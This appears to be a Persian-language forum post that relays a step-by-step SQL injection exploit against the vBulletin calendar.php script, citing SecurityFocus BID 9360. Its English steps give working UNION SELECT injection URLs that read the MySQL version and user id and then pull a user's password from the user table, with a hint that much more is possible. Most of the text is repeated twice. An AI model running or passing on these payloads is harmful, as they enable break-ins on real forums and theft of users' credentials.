امروز در سایت امیر KsN که نمیتونم سایتش رو بگم در قسمت اینگیلیسی یک باگ برای وی.بالیتین پیدا کردم.
برای اطمینان سایت معروف سیکیوریتی فاکِس چک کردم و دیدم که در وی.بالتین باگ پیدا شده.
برای این که تعصب خاصی روی سی.پی.جی ناک دارم چک کردم و دیدم که هنوز هیچ باگی برای این پرتال پیدا نشده:>.
فعلاً که بهتره:>.
و امّا باگ وی.بالتین...
1. Make sure calendar.php do exist.
2. Add a private event:
http://www.xxx.com/calendar.php?action=add&type=private&s=
3. You will get a eventid(e.g. 14) after that, now check that event.
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14
4. Get your userid
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
If the MySQL version is below 4.0.0, this step will fail.
Userid is in subject field(e.g. 31874)
The reason to know the userid is to pass following code.
----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
}
-----------------------------------------------------------------
5. The dirty part
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate
Let the subject and event fields show the result.
6. There are a lot of other things you would do.
ایم کپی شده از سایت امیر هست.
[web:48d4a2305d]http://www.securityfocus.com/bid/9360/exploit/[/web:48d4a2305d]
اینم سیکیوریتی فاکس.
برای اطمینان سایت معروف سیکیوریتی فاکِس چک کردم و دیدم که در وی.بالتین باگ پیدا شده.
برای این که تعصب خاصی روی سی.پی.جی ناک دارم چک کردم و دیدم که هنوز هیچ باگی برای این پرتال پیدا نشده:>.
فعلاً که بهتره:>.
و امّا باگ وی.بالتین...
1. Make sure calendar.php do exist.
2. Add a private event:
http://www.xxx.com/calendar.php?action=add&type=private&s=
3. You will get a eventid(e.g. 14) after that, now check that event.
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14
4. Get your userid
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events WHERE eventid = 14) order by eventdate
If the MySQL version is below 4.0.0, this step will fail.
Userid is in subject field(e.g. 31874)
The reason to know the userid is to pass following code.
----------------------------------------------------------------
if ($eventinfo[userid] != $bbuserinfo[userid])
{
$permissions=getpermissions();
if ($permissions[canpublicedit]!=1) {
show_nopermission();
}
}
-----------------------------------------------------------------
5. The dirty part
http://www.xxx.com/calendar.php?s=&action=edit&eventid=14 union (SELECT 1,0,31874,'0000-0-0',password,userid FROM user WHERE userid = 31874) order by eventdate
Let the subject and event fields show the result.
6. There are a lot of other things you would do.
ایم کپی شده از سایت امیر هست.
[web:48d4a2305d]http://www.securityfocus.com/bid/9360/exploit/[/web:48d4a2305d]
اینم سیکیوریتی فاکس.
